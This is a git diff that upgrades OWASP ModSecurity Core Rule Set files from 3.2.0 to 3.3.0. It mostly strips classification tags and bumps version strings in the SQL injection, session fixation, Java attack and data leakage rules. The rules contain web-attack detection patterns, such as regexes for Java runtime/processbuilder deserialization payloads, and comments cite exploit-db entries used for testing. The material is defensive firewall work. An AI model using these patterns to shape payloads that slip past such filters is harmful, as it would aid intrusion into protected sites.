 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1102,14 +977,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1142,14 +1013,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1178,14 +1045,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1214,14 +1077,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1259,13 +1118,9 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'WARNING',\
 setvar:'tx.anomaly_score_pl2=+%{tx.warning_anomaly_score}',\
 setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'"
@@ -1306,13 +1161,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -1334,13 +1185,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1386,13 +1233,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1428,13 +1271,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/3',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1455,13 +1294,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/3',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1498,13 +1333,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/3',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'WARNING',\
 setvar:'tx.anomaly_score_pl3=+%{tx.warning_anomaly_score}',\
 setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'"
@@ -1530,13 +1361,9 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/3',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'WARNING',\
 setvar:'tx.anomaly_score_pl3=+%{tx.warning_anomaly_score}',\
 setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'"
@@ -1563,13 +1390,9 @@ SecRule ARGS "@rx \W{4}" \
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/3',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'WARNING',\
 setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}',\
 setvar:'tx.anomaly_score_pl3=+%{tx.warning_anomaly_score}'"
@@ -1600,13 +1423,9 @@ SecRule REQUEST_BASENAME "@detectSQLi" \
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/3',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1653,13 +1472,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/3',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1689,13 +1504,9 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/4',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'WARNING',\
 setvar:'tx.anomaly_score_pl4=+%{tx.warning_anomaly_score}',\
 setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'"
@@ -1721,13 +1532,9 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´
 tag:'platform-multi',\
 tag:'attack-sqli',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SQL_INJECTION',\
- tag:'WASCTC/WASC-19',\
- tag:'OWASP_TOP_10/A1',\
- tag:'OWASP_AppSensor/CIE1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/4',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'WARNING',\
 setvar:'tx.anomaly_score_pl4=+%{tx.warning_anomaly_score}',\
 setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'"
diff --git a/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf b/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
index 4bb7f4dec..29d950b6f 100644
--- a/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
+++ b/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -41,11 +41,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'attack-fixation',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SESSION_FIXATION',\
- tag:'WASCTC/WASC-37',\
- tag:'CAPEC-61',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -65,11 +62,8 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio
 tag:'attack-fixation',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SESSION_FIXATION',\
- tag:'WASCTC/WASC-37',\
- tag:'CAPEC-61',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule REQUEST_HEADERS:Referer "@rx ^(?:ht|f)tps?://(.*?)\/" \
@@ -94,11 +88,8 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio
 tag:'attack-fixation',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/SESSION_FIXATION',\
- tag:'WASCTC/WASC-37',\
- tag:'CAPEC-61',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule &REQUEST_HEADERS:Referer "@eq 0" \
diff --git a/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf b/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf
index 9e93833db..46df4e125 100644
--- a/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf
+++ b/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -43,12 +43,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
 tag:'platform-multi',\
 tag:'attack-rce',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/JAVA_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/1',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -61,7 +58,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
 # [ Java deserialization vulnerability/Oracle Weblogic (CVE-2017-10271) ]
 # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ]
 #
-# Generic rule to detect processbuilder or runtime calls, if any of thos is found and the same target contains
+# Generic rule to detect processbuilder or runtime calls, if any of those is found and the same target contains
 # java. unmarshaller or base64data to trigger a potential payload execution
 # tested with https://www.exploit-db.com/exploits/42627/ and https://www.exploit-db.com/exploits/43458/
@@ -79,12 +76,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
 tag:'platform-multi',\
 tag:'attack-rce',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/JAVA_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/1',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?:unmarshaller|base64data|java\.)" \
@@ -107,12 +101,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
 tag:'platform-multi',\
 tag:'attack-rce',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/JAVA_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/1',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule MATCHED_VARS "@rx (?:runtime|processbuilder)" \
@@ -143,12 +134,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
 tag:'platform-multi',\
 tag:'attack-rce',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/JAVA_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/1',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -184,12 +172,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
 tag:'platform-multi',\
 tag:'attack-rce',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/JAVA_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -208,12 +193,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
 tag:'platform-multi',\
 tag:'attack-rce',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/JAVA_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -232,12 +214,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
 tag:'platform-multi',\
 tag:'attack-rce',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/JAVA_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -259,12 +238,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
 tag:'platform-multi',\
 tag:'attack-rce',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/JAVA_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/2',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -297,12 +273,9 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES
 tag:'platform-multi',\
 tag:'attack-rce',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/WEB_ATTACK/JAVA_INJECTION',\
- tag:'WASCTC/WASC-31',\
- tag:'OWASP_TOP_10/A1',\
 tag:'PCI/6.5.2',\
 tag:'paranoia-level/3',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
diff --git a/rules/REQUEST-949-BLOCKING-EVALUATION.conf b/rules/REQUEST-949-BLOCKING-EVALUATION.conf
index f7e1ff21b..5f370a166 100644
--- a/rules/REQUEST-949-BLOCKING-EVALUATION.conf
+++ b/rules/REQUEST-949-BLOCKING-EVALUATION.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -68,7 +68,7 @@ SecRule IP:REPUT_BLOCK_FLAG "@eq 1" \
 tag:'language-multi',\
 tag:'platform-multi',\
 tag:'attack-reputation-ip',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule TX:DO_REPUT_BLOCK "@eq 1" \
@@ -88,7 +88,7 @@ SecRule TX:ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \
 tag:'language-multi',\
 tag:'platform-multi',\
 tag:'attack-generic',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score=%{tx.anomaly_score}'"
diff --git a/rules/RESPONSE-950-DATA-LEAKAGES.conf b/rules/RESPONSE-950-DATA-LEAKAGES.conf
index 54d42f97e..59f681835 100644
--- a/rules/RESPONSE-950-DATA-LEAKAGES.conf
+++ b/rules/RESPONSE-950-DATA-LEAKAGES.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -41,12 +41,9 @@ SecRule RESPONSE_BODY "@rx (?:<(?:TITLE>Index of.*?Index of.*?Inde
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/INFO_DIRECTORY_LISTING',\
- tag:'WASCTC/WASC-13',\
- tag:'OWASP_TOP_10/A6',\
 tag:'PCI/6.5.6',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'ERROR',\
 setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
@@ -77,12 +74,9 @@ SecRule RESPONSE_BODY "@rx ^#\!\s?/" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/SOURCE_CODE_CGI',\
- tag:'WASCTC/WASC-13',\
- tag:'OWASP_TOP_10/A6',\
 tag:'PCI/6.5.6',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'ERROR',\
 setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
@@ -109,12 +103,10 @@ SecRule RESPONSE_STATUS "@rx ^5\d{2}$" \
 tag:'language-multi',\
 tag:'platform-multi',\
 tag:'attack-disclosure',\
- tag:'WASCTC/WASC-13',\
- tag:'OWASP_TOP_10/A6',\
 tag:'PCI/6.5.6',\
 tag:'paranoia-level/2',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'ERROR',\
 setvar:'tx.outbound_anomaly_score_pl2=+%{tx.error_anomaly_score}',\
 setvar:'tx.anomaly_score_pl2=+%{tx.error_anomaly_score}'"
diff --git a/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf b/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf
index 5bc80276f..f9af78323 100644
--- a/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf
+++ b/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -36,7 +36,7 @@ SecRule RESPONSE_BODY "@pmFromFile sql-errors.data" \
 tag:'platform-multi',\
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.sql_error_match=1'"
 SecRule TX:sql_error_match "@eq 1" \
@@ -53,10 +53,8 @@ SecRule TX:sql_error_match "@eq 1" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\
- tag:'CWE-209',\
 ctl:auditLogParts=+E,\
